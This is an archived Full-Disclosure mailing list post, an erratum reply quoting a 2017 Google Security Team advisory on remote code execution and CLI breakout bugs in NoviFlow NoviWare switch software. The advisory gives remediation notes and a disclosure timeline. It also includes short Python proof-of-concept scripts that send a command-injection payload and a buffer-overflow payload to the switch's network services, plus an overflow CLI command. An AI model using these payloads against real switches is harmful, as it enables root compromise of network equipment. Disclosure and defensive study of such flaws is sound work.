lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CALmbNiTuknjYppnV2o5PQ+896E=UYzRMO2miyhE-hSFq+BkSyQ@mail.gmail.com> Date: Tue, 22 Aug 2017 17:46:46 +0200 From: Francois Goichon via Fulldisclosure <fulldisclosure@...lists.org> To: fulldisclosure@...lists.org Subject: Re: [FD] NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities Erratum: "Remote code execution in novi_process_manager_daemon" is CVE-2017-12787, not CVE-2017-12784. On Wed, Aug 16, 2017 at 2:21 PM, Francois Goichon <frizn@...gle.com> wrote: > NoviFlow NoviWare <= NW400.2.6 multiple vulnerabilities > > > Introduction > ========== > NoviWare is a high-performance OpenFlow 1.3, 1.4 and 1.5 compliant > switch software developed by NoviFlow and available for license to > network equipment manufacturers. > Multiple vulnerabilities were identified in the NoviWare software > deployed on NoviSwitch devices. They could allow a remote attacker to > gain privileged code execution on the switch (non-default > configuration) or a low-privileged CLI user to execute code as root. > > > CVEs > ===== > * CVE-2017-12784: remote code execution in novi_process_manager_daemon > Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) > > * CVE-2017-12785: cli breakout in novish > Indicative CVSS v2 base score: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C) > > * CVE-2017-12786: remote code execution in noviengine and cliengine > Indicative CVSS v2 base score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) > > > Affected versions > ============== > NoviWare <= NW400.2.6 and devices where a vulnerable NoviWare version > is deployed > > > Author > ====== > François Goichon - Google Security Team > > > CVE-2017-12784 > ============== > Remote code execution in novi_process_manager_daemon > > Summary > ------------- > The NoviWare switching software distribution is prone to two distinct > bugs which could potentially allow a remote, unauthenticated attacker > to gain privileged (root) code execution on the switch device. > - A flaw when applying ACL changes requested from the CLI could expose > the novi_process_manager_daemon network service > - This network service is prone to command injection and a stack-based > buffer overflow > > Reproduction > ------------------ > If TCP port 2020 is accepting connections from the network, the > following python script can be used to ping yourself on vulnerable > versions : > --- > from struct import pack > import socket > > s = socket.socket() > s.connect((<switch host>, 2020)) > > payload = pack("<I", 0xffffffff).ljust(0x24) + "ping <your ip>; echo\x00" > s.sendall(pack("<II", 1, len(payload)+8)) > s.sendall(payload) > > s.close() > --- > > On vulnerable versions, the appliance will perform an ICMP request to > the specified IP, which can be observed in network logs. > > Remediation > ----------------- > - Upgrade to NoviWare400 3.0 or later. > - NoviFlow customers should have received instructions on how to get > the latest release along with release notes. For more information, > contact support@...iflow.com. > > > CVE-2017-12785 > ============== > Cli breakout in novish > > Summary > ------------- > The NoviWare switching software distribution is prone to a buffer > overflow and a command injection, allowing authenticated, > low-privileged users to break out of the CLI and execute commands as > root. > > Reproduction > ------------------ > Log in to the appliance via SSH and run the following command from the CLI: > -- > noviswitch# show log cli username > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > -- > > If the appliance is vulnerable, the cli crashes and the session ends. > > Remediation > ----------------- > - Upgrade to NoviWare400 3.0 or later. > - NoviFlow customers should have received instructions on how to get > the latest release along with release notes. For more information, > contact support@...iflow.com. > > > CVE-2017-12786 > ============== > Remote code execution in noviengine and cliengine > > Summary > ------------- > The NoviWare switching software distribution is prone to two distinct > bugs which could potentially allow a remote, unauthenticated attacker > to gain privileged (root) code execution on the switch device. > - A flaw when applying ACL changes requested from the CLI could expose > noviengine and cliengine network services > - These network services are prone to a stack-based buffer overflow > when unpacking serialized values. > > Reproduction > ------------------ > If TCP ports 9090 or 12345 are accepting connections from the network, > the following python script can be used to cause a crash on vulnerable > versions : > --- > from struct import pack > import socket > > s = socket.socket() > s.connect((<switch host>, <9090 or 12345>)) > > payload = "".join([pack("<I", 4) + "AAAA" for i in xrange(408)]) > payload = pack("<IIQ", 0, len(payload) + 16, 0) + payload > s.sendall(payload) > > s.read(1) > s.close() > --- > > A watchdog should restart the service if it has crashed. > > Remediation > ----------------- > - Upgrade to NoviWare400 3.0 or later. > - NoviFlow customers should have received instructions on how to get > the latest release along with release notes. For more information, > contact support@...iflow.com. > > > Disclosure timeline > =============== > 2017/05/11 - Report sent to NoviFlow > 2017/05/26 - Bugs acknowledged and remediation timeline confirmed > 2017/07/27 - NoviWare400 3.0 release fixes all the above vulnerabilities > 2017/08/09 - CVE requests > 2017/08/16 - Public disclosure -- François _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists